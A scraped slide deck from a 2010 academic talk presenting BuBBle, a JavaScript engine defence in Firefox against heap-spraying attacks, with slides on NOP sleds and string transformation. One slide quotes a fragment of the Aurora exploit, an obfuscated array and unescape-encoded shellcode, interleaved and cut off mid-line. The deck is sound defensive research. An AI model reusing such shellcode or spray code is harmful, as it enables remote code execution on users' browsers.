BuBBle: a Javascript engine level countermeasure against heap-spraying attacks
•
0 likes•698 views
This document discusses heap-spraying attacks and presents a new approach called BuBBle to counter them. Heap-spraying attacks involve flooding a program's memory with identical data to increase the likelihood of executing injected code. BuBBle monitors the heap for suspicious patterns and isolates suspect regions to prevent code execution. The authors evaluate BuBBle on Firefox and find it effectively prevents heap-spraying attacks with minimal performance overhead.
Recommended
Recommended
More Related Content
Recently uploaded
Recently uploaded (20)
Featured
Featured (20)
BuBBle: a Javascript engine level countermeasure against heap-spraying attacks
- 1. : a Javascript countermeasure against heap-‐spraying attacks Francesco Gadaleta -‐ Yves Younan -‐ Wouter Joosen Katholieke Universiteit Leuven ESSoS 2010 Pisa 3-‐4 Feb.
- 2. Overview ‣ Heap-‐spraying attacks ‣ BuBBle approach ‣ Experiments and Results ‣ Conclusion
- 3. A new target: web browsers
- 4. A new target: web browsers
- 5. A new target: web browsers
- 6. Firefox vulnerabilities http://www.mozilla.org/security/known-‐vulnerabilities/firefox35.html Integer overflow Memory corruption Crash and remote code execution Flash player unloading Heap buffer overflow in string to number conversion
- 7. Problem description: the art of spraying the heap
- 8. Problem description: the art of spraying the heap 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 SHELLCODE
- 9. Problem description: the art of spraying the heap sprayed heap 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 SHELLCODE 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 SHELLCODE 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 SHELLCODE SHELLCODE SHELLCODE 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 SHELLCODE 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 SHELLCODE SHELLCODE 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 SHELLCODE 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 SHELLCODE 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 SHELLCODE 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 SHELLCODE 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 SHELLCODE SHELLCODE SHELLCODE
- 10. Heap-‐spraying attacks Assumptions A buffer overflow/memory corruption vulnerability Users allowed to allocate memory Homogeneity of memory
- 11. Heap-‐spraying attacks Assumptions A buffer overflow/memory corruption vulnerability Users allowed to allocate memory Homogeneity of memory
- 12. Heap-‐spraying attacks Assumptions A buffer overflow/memory corruption vulnerability Users allowed to allocate memory Homogeneity of memory
- 13. Heap-‐spraying attacks Assumptions A buffer overflow/memory corruption vulnerability Users allowed to allocate memory Homogeneity of memory
- 14. BuBBle approach: Tracemonkey internals Homogeneity of memory -‐> monolithical data structure • Javascript Strings
- 15. BuBBle approach: the JSString type (Tracemonkey -‐ Mozilla Firefox 3.7) Tracemonkey internals mLength JSString mChars 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
- 16. BuBBle approach: the JSString type (Tracemonkey -‐ Mozilla Firefox 3.7) Tracemonkey internals mLength JSString mChars 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 SHELLCODE
- 17. BuBBle approach • Introduce diversity in contiguous blocks of memory • transform Javascript strings (internal structure)
- 18. approach Hi. I am a dangerous string to jump into a shellcode Transform Hi. I am a dangerous string to jump into a shellcode
- 19. approach Hi. I am a dangerous string to jump into a shellcode Transform Hi. I am a dangerous string to jump into a shellcode Restore Hi. I am a dangerous string to jump into a shellcode
- 20. approach Hi. I am a dangerous string to jump into a shellcode <Define string> Transform Hi. I am a dangerous string to jump into a shellcode Restore Hi. I am a dangerous string to jump into a shellcode
- 21. approach Hi. I am a dangerous string to jump into a shellcode <Define string> Transform Hi. I am a dangerous string to jump into a shellcode Restore Hi. I am a dangerous string to jump into a shellcode
- 22. approach Hi. I am a dangerous string to jump into a shellcode <Define string> Transform Hi. I am a dangerous string to jump into a shellcode <Use string> Restore Hi. I am a dangerous string to jump into a shellcode
- 23. approach Hi. I am a dangerous string to jump into a shellcode <Define string> Transform Hi. I am a dangerous string to jump into a shellcode <support data structure> <Use string> Restore Hi. I am a dangerous string to jump into a shellcode
- 24. BuBBle approach: support data • Interrupt array of characters • Change characters at random positions: how many? • Save support data
- 25. BuBBle approach: support data • Interrupt array of characters • Change characters at random positions: how many? • Save support data ... Value 2nd char Pos. 2nd char Value 1st char Pos. 1st char Num. intervals
- 26. BuBBle approach: js_Transform() “blah blah blah is a normal string with appended shellcode” rand <- 8 12 rand <- generate_random_position(0,MINLEN) len = 57 len <- string.length() intervals = 2 intervals <- len/MINLEN foreach (i in intervals) pos = MINLEN*i 2 7 a 35 w save_position(pos+rand) save_value(character[pos+rand]) change_value(character[pos + rand]) “blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
- 27. BuBBle approach: js_Transform() “blah blah blah is a normal string with appended shellcode” rand <- 8 12 rand <- generate_random_position(0,MINLEN) len = 57 len <- string.length() intervals = 2 intervals <- len/MINLEN foreach (i in intervals) pos = MINLEN*i 2 7 a 35 w save_position(pos+rand) save_value(character[pos+rand]) change_value(character[pos + rand]) “blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
- 28. BuBBle approach: js_Transform() “blah blah blah is a normal string with appended shellcode” rand <- 8 12 rand <- generate_random_position(0,MINLEN) len = 57 len <- string.length() intervals = 2 intervals <- len/MINLEN foreach (i in intervals) pos = MINLEN*i 2 7 a 35 w save_position(pos+rand) save_value(character[pos+rand]) change_value(character[pos + rand]) “blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
- 29. BuBBle approach: js_Transform() “blah blah blah is a normal string with appended shellcode” rand <- 8 12 rand <- generate_random_position(0,MINLEN) len = 57 len <- string.length() intervals = 2 intervals <- len/MINLEN foreach (i in intervals) pos = MINLEN*i 2 7 a 35 w save_position(pos+rand) save_value(character[pos+rand]) change_value(character[pos + rand]) “blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
- 30. BuBBle approach: js_Transform() “blah blah blah is a normal string with appended shellcode” rand <- 8 12 rand <- generate_random_position(0,MINLEN) len = 57 len <- string.length() intervals = 2 intervals <- len/MINLEN foreach (i in intervals) pos = MINLEN*i 2 7 a 35 w save_position(pos+rand) save_value(character[pos+rand]) change_value(character[pos + rand]) “blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
- 31. BuBBle approach: security evaluation • What? We still spray the heap! • Interrupt procedure call (.byte 0xcc) • IE and Aurora against Google (Jan 2010)
- 32. Aurora-‐Google (1-‐0) var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, <html><script>var sc = unescape(" 784, 707, 280, 238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, %u9090%u19ebu4b5bu3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d 700, 238, 287, 413, 224, 833, 728, 735, 756, 707, 280, 770, 322, 756, 707, 8%uebfaue805%uffe2%uffffu3931%ud8dbu87d8%u79bcud8e8%ud8d8%u9853%u53d4%uc4a8 770, 721, 812, 728, 420, 427, 371, 350, 364, 350, 392, 392, 287, 224, 770, %u5375%ud0b0%u2f53%ud7b2%u3081%udb59%ud8d8%u3a48%ub020%ueaebud8d8%u8db0%ubd 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686, 805, 812, 798, abu8caau9e53%u30d4%uda37%ud8d8%u3053%ud9b2%u3081%udbb9%ud8d8%u213aub7b0%ud8 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693, b6%ub0d8%uaaadub5b4%u538cud49eu0830%ud8dau53d8%ub230%u81d9%u9a30%ud8dbu3ad8 322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, %ub021%uebb4%ud8eauabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8%u3053%ud9b2%u30 770, 707, 833, 224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 81%udbfbud8d8%u213au3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2%ub 798, 280, 826, 679, 798, 224, 735, 427, 336, 413, 735, 420, 350, 336, 336, 28bu27d8%u9c8eu18ebu5898%udbe4%uadd8%u5121%u485eud8d8%u1fd8%udbdcub984%ubdf 413, 735, 301, 301, 287, 224, 861, 840, 637, 735, 651, 427, 770, 301, 805, 6%u9c1fudcdbubda0%ud8d8%u11ebu8989%u8f8bueb89%u5318%u989eu8630%ud8dau5bd8%u 693, 413, 875); d820%u5dd7%ud9a7%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e5 var arr = new Array; 3%u30fcudae5%ud8d8%u205bud727%u865cud8d9%u51d8%ub89eud8b2%u2788%uf08eu9e51% u3bcu485eud8d8%u1fd8%udbdcuba84%ubdf6%u9c1fudcdbubda0%ud8d8%ud8b2%ud8b2%uda for (var i = 0; i < 